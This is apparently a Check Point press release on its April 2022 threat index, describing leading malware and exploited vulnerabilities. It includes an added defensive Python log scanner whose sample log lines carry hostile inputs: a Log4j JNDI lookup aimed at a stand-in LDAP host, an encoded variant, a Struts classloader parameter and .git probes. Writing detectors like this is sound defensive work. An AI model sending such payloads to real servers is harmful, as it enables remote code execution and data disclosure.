Emotet remains unchallenged in April 2022
Check Point Research (CPR), the threat intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), has published the Global Threat Index for April 2022.
Emotet recorded a slight decline compared to March, when Easter-themed scams were added to its campaigns, but it remains at the top and affected 8.42 percent of all German companies and authorities recorded by Check Point. The decline this month may be partly due to Microsoft’s decision to disable certain macros in Office files, which affects the way Emotet is usually delivered. However, there are reports that Emotet is being distributed via a new method: phishing emails that contain a OneDrive URL.
Also dangerous are the critical vulnerabilities in the Java Spring Framework, known as Spring4Shell, which first appeared in March.
“As the cyber threat landscape is constantly changing and large companies, such as Microsoft, influence the parameters within which cyber criminals can operate, hackers need to become more creative in distributing their malware, as Emotet’s new method shows. In addition, the Spring4Shell vulnerability made headlines in April. Although it is not yet included in the top ten list of vulnerabilities, it has compromised over 35 percent of companies worldwide in the first month of its appearance alone, which is why we expect it to rise in the list of threats in the coming months,” explains Maya Horowitz, Director of Threat Intelligence and Research and Products at Check Point.
Top 3 Most Wanted Malware for Germany:
The arrows refer to the change in placement from the previous month.
Emotet is still in first place. Agent Tesla takes second place and FormBook takes third place.
- ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. It was previously used as a banking Trojan, but currently serves as a distributor of other malicious programs or entire campaigns. It uses various methods to stay operational and employs evasion techniques to avoid detection. In addition, it can be spread through phishing emails that contain malicious attachments or links.
- ↑ Agent Tesla – AgentTesla is an advanced RAT (remote access Trojan) that acts as a keylogger and information stealer and is able to monitor and collect the victim’s keystrokes and system clipboard, take screenshots and exfiltrate credentials from a variety of software installed on the victim’s computer (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).
- ↑ Formbook – FormBook is an infostealer that targets the Windows operating system and was first discovered in 2016. It is marketed in hacking forums as Malware-as-a-Service (MaaS) because of its strong evasion techniques and relatively low price. FormBook collects and steals credentials from various web browsers, takes screenshots, monitors and logs keystrokes, and can download and run files from its C&C server on instruction.
The Top 3 Most Wanted Vulnerabilities:
This month, the most exploited vulnerability is Web Server Exposed Git Repository Information Disclosure, which affects 46 percent of companies worldwide, followed by Apache Log4j Remote Code Execution (CVE-2021-44228), which has fallen from first to second place and also affects 46 percent of companies worldwide. Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) is now in third place in the list of the most frequently exploited vulnerabilities, with a global impact of 45 percent.
- ↑ Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported in Git repositories that are exposed by web servers. Successful exploitation of this vulnerability could allow the unintentional disclosure of account information.
- ↓ Apache Log4j Remote Code Execution (CVE-2021-44228) – A vulnerability in Apache Log4j allows a remote attacker to execute arbitrary code on the affected system.
- ↑ Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) – A security bypass vulnerability exists in Apache Struts. The vulnerability is due to insufficient validation of the data processed by ParametersInterceptor, which allows manipulation of the class loader. A remote attacker could exploit this vulnerability by providing a class parameter in a request.
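All three of the vulnerabilities listed above leave a recognisable trace in ordinary web-server access logs: requests into a served `.git/` directory, `${jndi:` lookup strings aimed at Log4j, and request parameters whose names start with `class.` aimed at the Struts ParametersInterceptor. The following Python script is an added example (not part of the Check Point report and not Check Point code) that scans Combined Log Format lines for those three indicators so a defender can see which of them are being probed and whether the server actually answered with a 200. The log lines are constructed for the example, the function names `classify`, `scan` and `summarize` are hypothetical, and the script URL-decodes each request target twice so that percent-encoded (and double-encoded) payloads are not missed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format); hosts and traffic are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Apr/2022:10:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.68.0"
203.0.113.5 - - [12/Apr/2022:10:01:03 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "curl/7.68.0"
198.51.100.7 - - [12/Apr/2022:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Apr/2022:10:03:44 +0000] "GET /login?user=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.33 - - [12/Apr/2022:10:04:05 +0000] "GET /action.do?class.classLoader.x=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.34 - - [12/Apr/2022:10:05:00 +0000] "GET /search?q=git+class+loader HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.21 - - [12/Apr/2022:10:06:31 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "python-requests/2.27"
198.51.100.9 - - [12/Apr/2022:10:07:12 +0000] "GET /api?id=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.invalid%252Fb%257D HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Combined Log Format prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Log4j JNDI lookup marker, matched case-insensitively after decoding.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify(line):
    """Parse one access-log line and return its indicator findings, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    # Decode twice so %24%7B and %2524%257B both become ${ before matching.
    decoded = unquote(unquote(target))
    parts = urlsplit(decoded)
    findings = []

    # 1. Exposed Git repository: any request into a served .git directory.
    if "/.git/" in parts.path or parts.path.endswith("/.git"):
        findings.append("exposed-git-repository")

    # 2. Log4j: a JNDI lookup string anywhere in the decoded request target.
    if JNDI_RE.search(decoded):
        findings.append("log4j-jndi-lookup")

    # 3. Struts ParametersInterceptor: a parameter *name* starting with "class.".
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower().startswith("class."):
            findings.append("struts-classloader-parameter")
            break

    return {
        "ip": m.group("ip"),
        "target": target,
        "status": int(m.group("status")),
        "findings": findings,
    }


def scan(log_text):
    """Return the parsed records that carry at least one finding."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


def summarize(hits):
    """Count findings, separating served (2xx) responses from blocked or missing ones."""
    counts = {}
    for rec in hits:
        served = 200 <= rec["status"] < 300
        for f in rec["findings"]:
            bucket = counts.setdefault(f, {"served": 0, "other": 0})
            bucket["served" if served else "other"] += 1
    return counts


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["status"], rec["findings"], rec["target"])
    print(summarize(scan(SAMPLE_LOG)))
```

A `.git` probe that the server answered with 404 is still worth noting (someone is looking), but only 2xx answers indicate the repository was actually served; blocking `/.git/` at the web server and patching Log4j and Struts remove the underlying exposure, and the script then only reports probes.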
The Top 3 Most Wanted Mobile Malware:
This month, AlienBot remains the most common mobile malware. FluBot and xHelper exchange places.
- ↔ AlienBot – The AlienBot malware family is a Malware-as-a-Service (MaaS) for Android devices that allows an attacker to inject malicious code into legitimate financial applications as a first step. The attacker gains access to the victims’ accounts and eventually takes complete control of their device.
- ↑ FluBot – FluBot is an Android malware that is spread via phishing SMS messages (smishing), which usually pretend to come from logistics providers. As soon as the user clicks on the link in the message, they are redirected to the download of a fake application containing FluBot. After installation, the malware has various functions for collecting login data and supporting the smishing operation itself, including uploading contact lists and sending SMS messages to other phone numbers.
- ↓ xHelper – A mobile malware that has been observed since March 2019 and is used to download other malicious apps and display advertisements. The application is able to hide from the user and can even reinstall itself after it has been uninstalled.
Top 3 attacked industries and sectors in Germany:
- ↑ Software Vendor.
- ↑ Education/Research.
- ↓ ISP/MSP.
Check Point’s Global Threat Impact Index and its ThreatCloud Map are based on Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat data collected by hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This database is enriched by AI-based engines and exclusive research data from Check Point Research, the Intelligence & Research department of Check Point Software Technologies.